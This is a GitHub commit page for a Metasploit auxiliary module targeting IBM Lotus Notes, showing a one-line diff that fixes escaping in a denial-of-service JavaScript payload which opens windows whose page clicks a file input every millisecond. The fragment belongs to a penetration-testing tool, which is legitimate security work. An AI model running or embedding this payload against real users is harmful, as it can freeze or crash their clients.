Skip to content

Commit 77c1328

Browse files
committed
Ensure closing script tag has necessary escape.
1 parent 9c16da9 commit 77c1328

File tree

1 file changed

+1
-1
lines changed

1 file changed

+1
-1
lines changed

modules/auxiliary/dos/http/ibm_lotus_notes2.rb

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -52,7 +52,7 @@ def setup
5252
delete kins[k];
5353
}
5454
}
55-
w = open('data:text/html,<input type=file id=f><script>f.click();setInterval("f.click()", 1);<\/script>');
55+
w = open('data:text/html,<input type="file" id="f"><script>f.click();setInterval("f.click()", 1);<\\/script>');
5656
if (w) {
5757
kins[i] = w;
5858
i++;

0 commit comments

Comments
 (0)